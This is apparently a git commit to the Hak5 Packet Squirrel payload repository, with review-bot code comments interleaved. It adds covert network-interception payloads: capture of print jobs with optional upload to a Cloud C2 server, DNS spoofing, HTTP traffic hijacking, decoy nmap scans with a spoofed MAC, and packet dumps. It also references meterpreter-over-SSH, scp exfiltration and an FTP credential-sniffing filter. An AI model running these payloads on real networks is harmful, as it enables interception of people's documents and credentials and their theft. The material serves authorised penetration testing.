Update repos for Packet Squirrel Mk 2 release

pull/40/head
Mike Kershaw / Dragorn 2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions

@ -1,39 +1,63 @@
# Payload Library for the Packet Squirrel by Hak5
This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
This repository contains payloads and extensions for the Hak5 Packet Squirrel, developed by the Hak5 Community.
Have a great payload? Submit it by forking the payload repository and submitting a pull request!A
Learn more about Github pull requests [here](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests) or from the Hak5 Bash Bunny tutorial [here](https://www.youtube.com/watch?v=H6z9BXevsZg).
## Packet Squirrel Versions
The Packet Squirrel Mark II expands on the capabilities of the original Packet Squirrel, introducing new commands and more flexible networking configurations.
Payloads for the original Packet Squirrel can be found in the `legacy-mk1` directory. These payloads may not work without modification on the Packet Squirrel Mark II.
## About the Packet Squirrel
The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
The Packet Squirrel Mark II by Hak5 is a stealthy pocket-sized man-in-the-middle.
This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
- [Documentation](https://docs.hak5.org/packet-squirrel-mark-ii "Documentation")
- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
- [Discord](https://hak5.org/discord "Discord")
![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
## Updating
If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness or safety. As with any script, you are advised to proceed with caution.
## Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
## Contributing
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publicly available.
Please adhere to the following best practices and style guide when submitting a payload.
Hak5 reserves the right to modify payloads to meet the guidelines when necessary, or to decline to include a payload in the public repository.
Please ensure that any default configuration values do not point to actual services! Do not include *your* passwords or login information in submitted payloads!
### Naming Conventions
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be placed into its own directory, with `-` or `_` used in place of spaces, in one of the categories such as exfiltration, phishing, remote_access or recon. Please do not create your own category.
The payload itself should be named `payload`.
Additional files and documentation can be included in the payload directory. Documentation should be in `README.md` or `README.txt`.
### Comments
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
# Title: Meterpreter-via-SSH
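Review bot: stray character in the contribution paragraph: the line `Have a great payload? Submit it by forking the payload repository and submitting a pull request!A` ends with a trailing `A` that should be dropped. The new `## Packet Squirrel Versions` section pointing at `legacy-mk1`, the updated documentation URL, and the `publically` -> `publicly` and `submit into` -> `placed into` corrections otherwise read cleanly.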
@ -53,6 +77,7 @@ Payloads should begin with comments specifying at the very least the name of the
# Cyan Blink 1 Time - Meterpreter Successful
### Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
@ -61,9 +86,11 @@ Configurable options should be specified in variables at the top of the payload.
MSF_PORT=31337
### LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
LED SETUP
NETMODE NAT
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
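Review bot: typo in the LED paragraph: `Common payload states include a `SETUP`, with may include a `FAIL`` should read `which may include`. The sentence is carried over unchanged from the previous README, so it is worth fixing here while the section is being touched.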

legacy-mk1/README.md Normal file
@ -0,0 +1,75 @@
# Legacy payloads
These payloads are for the original Packet Squirrel device.
They may or may not run without modification on the Packet Squirrel Mark II.
## Payload Library for the Packet Squirrel by Hak5
This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
## About the Packet Squirrel
The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle.
This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch.
- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation")
- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums")
- [Discord](https://hak5.org/discord "Discord")
![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg)
## Updating
If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/).
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
## Legal
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
## Contributing
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.
### Naming Conventions
Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
### Comments
Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus
# Version: 1.0
# Category: Remote-Access
# Net Mode: NAT
# Firmware: 1.2
#
# LED State Descriptions
# Magenta Solid - Configuring NETMODE
# LED OFF - Waiting for BUTTON
# Red Blink 2 Times - SSH Connection Failed
# Amber Blink 5 Times - SSH Connection Successful
# Red Blink 1 Time - Meterpreter Failed
# Cyan Blink 1 Time - Meterpreter Successful
### Configuration Options
Configurable options should be specified in variables at the top of the payload.txt file
# Options
SSH_USER="username"
SSH_HOST="hostname"
MSF_PORT=31337
### LED
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`.
LED SETUP
NETMODE NAT
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
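Review bot: the legacy README is a verbatim copy of the old top-level text and so keeps the wording that the top-level README corrects in this same commit: `publically` (should be `publicly`), `should be submit into its own directory` (should be `placed into`), and `with may include a FAIL` (should be `which may include`). Even though this file is meant as frozen documentation for the original device, consider applying the same corrections rather than preserving the typos. Keeping the original documentation URL and the `Firmware: 1.2` example header here is appropriate.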

@ -1,5 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
function run() {
LED STAGE1
SWITCH_POS=$(SWITCH)

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: FreeDaNutz
# Description: This payload will compress the loot folder and then send that file to a remote server via scp

@ -1,5 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
function scan() {
LED G
ifconfig wlan0 down

@ -1,4 +1,8 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
LED STAGE1
NETMODE NAT

@ -1,4 +1,8 @@
# Title: Caternet
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Author: Hak5Darren
# Version: 1.0
# Description: Forwards all traffic to local webserver hosting cat photos.

@ -1,4 +1,7 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: DNSSpoof
# Description: Forge replies to arbitrary DNS queries using DNSMasq

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: IP Info
# Author: Hak5Darren
# Version: 1.0

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: NMap Dump
# Description: Dumps NMap scan data to USB storage.
# Author: infoskirmish.com

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: Meterpreter-via-SSH
# Description: Covert meterpreter shell via overt SSH connection
# Author: Zappus

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: SSH Remote Management Tool for Packet Squirrel
# Description: Makes packet Squirrel directly accessible via SSH on a remote server
# Author: BlackPropaganda
@ -85,4 +89,4 @@ uci commit autossh
LED ATTACK
# starting autossh
/etc/init.d/autossh start
/etc/init.d/autossh start
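Review bot: the two `/etc/init.d/autossh start` lines at the end of this hunk render as a changed pair with identical text, which suggests only the trailing newline or whitespace changed. If the intent was to add a missing trailing newline that is fine, but it is worth confirming the command was not meant to be duplicated or otherwise altered.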

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: Togglable-VPN
# Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server,
# or if the button is pressed, send traffic from the clients through said tunnel.

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: OpenVPN
# Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel.
# Author: Hak5

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: iSpy Passive Intel Gathering
# Description: Launches various tools to sniff out intel data.

@ -1,4 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# ngrep payload to snag creds
NGREP_OPTIONS=("-wiql" "user|pass" "port" "21")

@ -1,5 +1,8 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5

@ -0,0 +1,53 @@
#!/bin/bash
# Title: PCL Printer Capture
# Description: Capture PCL IP printer jobs with a dynamic proxy
# Author: Hak5
# To convert PCL files to PDF, use a tool like GhostPCL:
# https://ghostscript.com/releases/gpcldnld.html
#
# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something
# like:
# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream
# Do we automatically exfiltrate to Cloud C2? Uncomment to send files to your
# CloudC2 server automatically
#
# USE_C2=1
# By default, C2WATCHDIR removes files after they're sent. To keep them, uncomment
# C2_KEEP_FILES below
#
# C2_KEEP_FILES=1
LED SETUP
NETMODE NAT
# We have to have attached USB
USB_WAIT
# Make sure the directory exists
mkdir /usb/printer/
# If USE_C2 isn't empty, we're uploading to CloudC2
if [[ ! -z "$USE_C2" ]]; then
# If C2_KEEP_FILES is not empty, we want to preserve the
# files on USB, otherwise run C2WATCHDIR normally and delete
# the files after they are sent.
if [[ ! -z "$C2_KEEP_FILES" ]]; then
C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ &
else
C2WATCHDIR /usb/printer/ &
fi
# Give C2WATCHDIR a moment to sync any old files that were present
sleep 3
fi
LED ATTACK
# Use a dynamic proxy to MITM standard PCL IP printers
DYNAMICPROXY CLIENT /usb/printer/print_ 9100
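Review bot: `mkdir /usb/printer/` is not idempotent: on a second run against the same USB stick the directory already exists, so `mkdir` prints an error and returns non-zero. Use `mkdir -p /usb/printer/`, as the other payloads in this commit do (`mkdir -p /usb/loot/tcpdump`). Minor: `[[ ! -z "$USE_C2" ]]` and `[[ ! -z "$C2_KEEP_FILES" ]]` read more clearly as `[[ -n ... ]]`.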

@ -0,0 +1,32 @@
#!/bin/bash
# Title: Gatekeeper
#
# Description: Toggle access to the network with the pushbutton
# Author: Hak5
# Set the default network mode (such as NAT or BRIDGE)
NETWORK_MODE="BRIDGE"
NETMODE ${NETWORK_MODE}
LED G SOLID
while true; do
# Run the buttom command with no LED; this way the LED stays
# solid green
NO_LED=1 BUTTON
# Check the existing network mode; if we're not the right mode,
# send the target device to jail
if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then
LED R FAST
NETMODE JAIL
LED R SOLID
else
# Set the network mode back to our normal mode
LED G FAST
NETMODE ${NETWORK_MODE}
LED G SOLID
fi
done
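Review bot: unquoted command substitution in the mode check: `if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]` breaks if `/tmp/squirrel_netmode` is missing or empty, because `[` then sees `== BRIDGE ]` and reports a unary-operator error instead of taking the else branch. Quote it: `if [ "$(cat /tmp/squirrel_netmode)" == "${NETWORK_MODE}" ]; then`. Comment typo: `buttom` -> `button`.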

@ -0,0 +1,14 @@
#!/bin/bash
# Title: DNS Sinkhole
# Description: Demonstrate sinkholing a DNS domain (hak5.org)
# Author: Hak5
# This payload will intercept any requests for a *.hak5.org domain
# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6)
NETMODE BRIDGE
LED R SINGLE
SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1'
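Review bot: if the `SPOOFDNS` match patterns are regular expressions, as the leading `.*` in `.*.hak5.org` suggests, the unescaped dots in `hak5.org` match any character, so the rule is looser than the `*.hak5.org` wildcard the comment describes; `.*\.hak5\.org` and `hak5\.org` would match only the intended names. If `SPOOFDNS` takes glob-style patterns instead, the leading `.*` is probably not what was meant, and the header comment should state which syntax applies.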

@ -0,0 +1,30 @@
#!/bin/bash
# Title: Minimalistic web intercept
# Description: Replace HTTP with Squirrels.
# Author: Hak5
#
# squirrel.jpg from Wikipedia
# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg
# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen
# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion,
# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0,
# https://commons.wikimedia.org/w/index.php?curid=10213698
NETMODE NAT
LED B SOLID
# Add a web payload to the nftables
nft add table ip webpayload
# Hook prerouting
nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; }
# Redirect port 80 to our local 8080
nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080
while true;
do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \
cat - /root/payloads/$(SWITCH)/squirrel.jpg | \
netcat -l -p 8080;
done
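Review bot: the hand-built response uses bare `\n` line endings (`echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n"`), whereas HTTP header lines end in `\r\n`; most clients tolerate LF, but CRLF is the correct terminator. There is also no `Content-Length`, so the client only learns the image is complete when the connection closes, and whether `netcat -l -p 8080` closes the socket once stdin reaches EOF depends on the netcat implementation (some need `-N` or `-q`). Finally, the `webpayload` nft table is never removed, so the port 80 redirect persists after the loop is stopped; a trap that runs `nft delete table ip webpayload` would restore the device's normal forwarding.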

@ -0,0 +1,30 @@
Title: NMap Dump
Description: Dumps NMap scan data to USB storage.
Author: infoskirmish.com
Version: 2.0
Category: sniffing
Target: Any
Net Mode: NAT
LEDs
SUCCESS: Scan complete
FAIL: No USB storage found
SCANNING: Rapid White
This payload will launch NMap on a given interface (default eth0) and scan the local subnet. There is no need to know the subnet as the payload will capture and infer the subnet from the IP it receives while launching.
The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump
The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate.
Updated for the Packet Squirrel Mark II by Hak5
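Review bot: the README disagrees with the payload on two settings. It gives the default loot path as `/mnt/loot/nmapdump`, while the payload sets `lootPath="/usb/loot/nmapdump"`, and it lists `Net Mode: NAT`, while the payload header says `Net Mode: TRANSPARENT` and the constant actually applied is `mode="BRIDGE"`. Pick one value for each and state it in both files. Minor: `variables that maybe changed` -> `variables that may be changed`.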

@ -0,0 +1,276 @@
#!/bin/bash
#
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
#
# Title: NMap Dump
# Description: Dumps NMap scan data to USB storage.
# Author: infoskirmish.com
# Version: 2.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# Updated to the Packet Squirrel Mark II by Hak5
# LEDs
# SUCCESS: Scan complete
# FAIL: No USB storage found
# SCANNING: Rapid White
#### Constants ####
# If you know which interface will allow outbound traffic you can specify it here
# leaving it blank will enable the payload trying to attempt to figure out which
# interface to use.
defaultInterface="lo"
# Number of decoy IPs to spawn
rndDecoyNumber=5
# Spoof the MAC of this device type
spoofDevType="Cisco"
# Seconds to sleep while loading NAT
netSleep=10
# Squirrel NETMODE TRANSPARENT | BRDIGE | NAT | NONE
# BRIDGE mode will preserve the Squirrel IP
mode="BRIDGE"
# When done what should we do? reboot | halt | nothing | poweroff
onEnd="halt"
# Path to store results
lootPath="/usb/loot/nmapdump"
# File name scheme
lootFileNameScheme="nmapdump_$(date +%Y-%m-%d-%H%M)"
# Clear the log every run?
clearLogs=true
#### Payload Code ####
function finish() {
# Sync filesystem
sync
# Indicate successful shutdown
LED B SUCCESS
sleep 1
# Halt the system
LED OFF
case "$onEnd" in
"poweroff") poweroff ;;
"reboot") reboot ;;
"halt") halt ;;
"nothing") echo "see ya!" >> $lootPath/log.txt ;;
*) reboot;;
esac
}
function run() {
# Create loot directory
mkdir -p $lootPath &> /dev/null
# Clear the logs
if [ "${clearLogs}x" == "truex" ]; then
echo > ${lootPath}/log.txt
fi
# Set networking mode to user preferance and sleep to allow time to sync up.
# If set to NONE this will not be set and thus not kick you out of your SSH session.
if [ "$mode" != "NONE" ]; then
NETMODE $mode
sleep $netSleep
fi
# Log ifconfig data; helpful for troubleshooting
ifconfig >> $lootPath/log.txt
# Starting scanning LED (rapid white blink)
LED W VERYFAST
# Run nmap scan with options
# Now lets figure out which interface to use.
iface=$(ip -o link show | awk '{print $2}')
# Set ipv6 default to null
ipv6=""
# Now lets look at the ip addresses assigned to the various interfaces.
while IFS= read -r line; do
# Standardize interface name
line="${line//:}"
# We can skip lo
if [ "$line" != "lo" ]; then
# Get IP Address for Interface.
ifip=$(ifconfig $line 2>/dev/null|awk '/inet addr:/ {print $2}'|sed 's/addr://')
# Make sure result is not null.
if [ "$ifip" ]; then
# Store for later use the ip addresses associted with interface.
# We don't want an empty 1st line.
if [ "$ipaddresses" ]; then
ipaddresses+=$'\n'$ifip
else
ipaddresses=$ifip
fi
# If user has specified a default interface than we can disregard.
if [ ! "$defaultInterface" ]; then
# Store the interface for later use.
# We don't want an empty 1st line.
if [ "$interfaces" ]; then
interfaces+=$'\n'$line
else
interfaces=$line
fi
fi
# convert ip to subnet
newSubNet=`echo $ifip | cut -d"." -f1-3`
newSubNet=$newSubNet".1/24"
# Add subnet to list
# We don't want a leading empty character.
if [ "$newSubNet" ]; then
targets+=" $newSubNet"
else
targets=$newSubNet
fi
fi
fi # end our test for lo
done <<< "$iface" # loop to gather IP addresses
# Clean up subnets to remove accidental double spaces.
echo "$targets" | awk '$1=$1' &> /dev/null
# if targets is empty we have no subnets. Let's check if we can find IPv6
if [ ! "$targets" ]; then
# Collect all uniqu IPv6 address that we can ping.
ipv6=$(ping -6 ff02::1 -w 10 2>/dev/null | awk '/from/ {print $4}' | cut -d":" -f1-6 | sort | uniq | tr "\r\n" " ")
if [ ! "$ipv6" ]; then
# We could not find any ipv4 address and ipv6 returned nothing.
echo "Could not accquire any IP addresses to scan." >> $lootPath/log.txt
sync
LED OFF
exit 1
fi
fi
# Add lo as some setups the loopback maybe the interface to send out traffic
# If user supplies default interface tie in their selection and disregard the
# auto locate data.
if [ ! "$defaultInterface" ]; then
interfaces+=$'\nlo'
else
interfaces=$defaultInterface
fi
# log subnets and ip addresses we found
echo "Subnets to scan $targets" >> $lootPath/log.txt
echo "IPs to scan $ipaddresses" >> $lootPath/log.txt
# Document the fact we will be scanning ipv6
if [ "$ipv6" ]; then
echo "We will be scanning ipv6 addresses" >> $lootPath/log.txt
fi
# Now lets find the interface that will allow outbound traffic on the LAN.
while IFS= read -r interface; do
# We will use the ip addresses we found to see if this interface can ping it.
while IFS= read -r ip; do
# If we can send ping packets then the interface is likley able to work with nmap
# Determin if we should ping in ipv4 or ipv6
if [ ! "$ipv6" ]; then
if [[ ! $(ping -I $interface $ip -w 3 | grep '0 packets received') ]]; then
# Make sure wee don't end up with a blank first line.
if [ "$goodInterface" ]; then
goodInterfaces+=$'\n'$interface
else
goodInterfaces=$interface
fi
fi
else
if [[ ! $(ping -6 ff02::1 -w 3 | grep '0 packets received') ]]; then
# Make sure wee don't end up with a blank first line.
if [ "$goodInterface" ]; then
goodInterfaces+=$'\n'$interface
else
goodInterfaces=$interface
fi
fi
fi
done <<< "$ipaddresses" # end loop to find interfaces we can use
done <<< "$interfaces" # end loop to scan interfaces
# Log interfaces we can use
echo "Interfaces allowing outbound traffic: $goodInterfaces" >> $lootPath/log.txt
# Make sure we have interfaces that will allow outbound traffic.
if [ "$goodInterfaces" ]; then
while IFS= read -r goodInterface; do
# Finally! Lets run NMap!
# Use ipv4
if [ ! "$ipv6" ]; then
nmap -Pn -e $goodInterface -sS -F -sV -oA $lootPath/$lootFileNameScheme -D RND:$rndDecoyNumber --randomize-hosts --spoof-mac $spoofDevType $targets >> $lootPath/log.txt
else
# Use ipv6
nmap -Pn -e $goodInterface -sT -F -R -oA $lootPath/$lootFileNameScheme --randomize-hosts --spoof-mac $spoofDevType -6 $ipv6 >> $lootPath/log.txt
fi
done <<< "$goodInterfaces"
else
echo "Could not find any interfaces that will allow outbound traffic." >> $lootPath/log.txt
exit 1
fi
# Done scanning; clean up.
finish
} # end run() function
USB_WAIT
# Show attack LED
LED ATTACK
# ATTACK!!!!
run
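Review bot: several logic problems in `run()`. The interface-probing loops test `if [ "$goodInterface" ]` but append to `goodInterfaces`; `goodInterface` is unset at that point, so the else branch always runs and `goodInterfaces=$interface` is overwritten on every hit, keeping only the last usable interface. The subnet accumulation is inverted: `newSubNet` is never empty, so `targets+=" $newSubNet"` always runs and the `targets=$newSubNet` branch is dead (the test should be on `$targets`), and the following `echo "$targets" | awk '$1=$1' &> /dev/null` discards its output, so it cleans nothing; `targets=$(echo "$targets" | awk '$1=$1')` would. The header also contradicts itself: it says the payload is for the original Squirrel and may not work on the Mark II, then `Updated to the Packet Squirrel Mark II by Hak5`; if this is the Mark II version that goes with the new README above, the legacy warning looks like a copy-paste leftover. Spelling in comments: `BRDIGE`, `preferance`, `associted`, `uniqu`, `accquire`, `likley`, `Determin`, `wee`.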

@ -0,0 +1,7 @@
# Wake-on-LAN
This payload generates a WoL (Wake-on-LAN) magic packet for the devices listed in the
payload configuration.
Make sure to copy BOTH `payload` and `wol_python.py` to the SAME payload directory on
the Packet Squirrel!

@ -0,0 +1,37 @@
#!/bin/bash
# Title: Wake on Lan
# Description: Wake On Lan with Python
# Author: Hak5
# Configuration
# MAC addresses, separated by spaces
WOL_TARGETS="11:22:33:44:55:66 AA:BB:CC:DD:EE:FF"
# How often do we wake up systems, in seconds?
WOL_INTERVAL=30
# NAT mode
NETMODE NAT
# Set the LED
LED G SINGLE
while true; do
# Toggle the LED, send the WoL
LED W SOLID
python /root/payloads/$(SWITCH)/python_wol.py ${WOL_TARGETS}
# Wait one second for the LED to be visible
sleep 1
# Reset the LED
LED G SINGLE
# Wait the wakeup interval
sleep ${WOL_INTERVAL}
done
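Review bot: filename mismatch: the payload runs `python /root/payloads/$(SWITCH)/python_wol.py`, while the accompanying README tells users to copy `wol_python.py` beside `payload`; one of the two names must change or the payload fails with a file-not-found error every cycle. Also consider quoting the script path (`"/root/payloads/$(SWITCH)/..."`); `${WOL_TARGETS}` is correctly left unquoted so word splitting passes each MAC as a separate argument, and a comment saying so would stop someone "fixing" it.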

@ -0,0 +1,21 @@
#!/usr/bin/python
import sys
import socket
# Simplified function to send a wake-on-lan packet
def send_wol(destination):
sync = "FF" * 6
macs = destination * 16
payload = bytes.fromhex(sync + macs)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(payload, ("255.255.255.255", 9))
# Send a WoL packet for each MAC address we
# were called with
for mac in sys.argv[1:]:
fin_mac = mac.replace(":", "")
send_wol(fin_mac)
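Review bot: `bytes.fromhex(...)` exists only in Python 3; under Python 2, where `bytes` is an alias for `str`, it raises `AttributeError`. With the shebang `#!/usr/bin/python` and the payload invoking plain `python`, the script only works if that resolves to Python 3 on the device; `#!/usr/bin/env python3` (and `python3` in the payload) would make the requirement explicit. The MAC normalisation also only strips `:`, so a `-`-separated address makes `bytes.fromhex` fail; `mac.replace(":", "").replace("-", "")` plus a check that twelve hex digits remain would be more forgiving.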

@ -0,0 +1,72 @@
#!/bin/bash
#
# Title: TCPDump
# Description: Dumps networking-data to USB storage. Completes on button-press or storage full.
# Author: Hak5
# Version: 1.0
# Category: sniffing
# Target: Any
# Net Mode: TRANSPARENT
# LEDs
# SUCCESS: Dump complete
# FAIL: No USB storage found
function monitor_space() {
while true
do
[[ $(USB_FREE) -lt 10000 ]] && {
kill $1
LED G SUCCESS
sync
break
}
sleep 5
done
}
function finish() {
# Kill TCPDump and sync filesystem
kill $1
wait $1
sync
# Indicate successful shutdown
LED R SUCCESS
sleep 1
# Halt the system
LED OFF
halt
}
function run() {
# Create loot directory
mkdir -p /usb/loot/tcpdump &> /dev/null
# Set networking to TRANSPARENT mode and wait five seconds
NETMODE TRANSPARENT
sleep 5
LED ATTACK
# Start tcpdump on the bridge interface
tcpdump -i br-lan -s 0 -w /usb/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
tpid=$!
# Wait for button to be pressed (disable button LED)
NO_LED=true BUTTON
finish $tpid
}
# This payload will only run if we have USB storage
# Wait for the USB drive
USB_WAIT
LED ATTACK
run &
monitor_space $! &
wait
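Review bot: `monitor_space $!` receives the PID of the `run &` subshell, not of tcpdump, so when free space drops below the threshold `kill $1` terminates the subshell while tcpdump (its child, tracked only in `tpid` inside `run`) keeps writing to the nearly full drive. Because `run` is then gone and `monitor_space` breaks out of its loop, the final `wait` returns and the payload exits with the capture still running. Have `run` write `$tpid` to a file that `monitor_space` reads and kills, or kill the subshell's whole process group. Minor: the two stop paths signal with different colours (`LED G SUCCESS` in `monitor_space`, `LED R SUCCESS` in `finish`), and `finish` halts the device while the storage-full path does not; check that the asymmetry is intended.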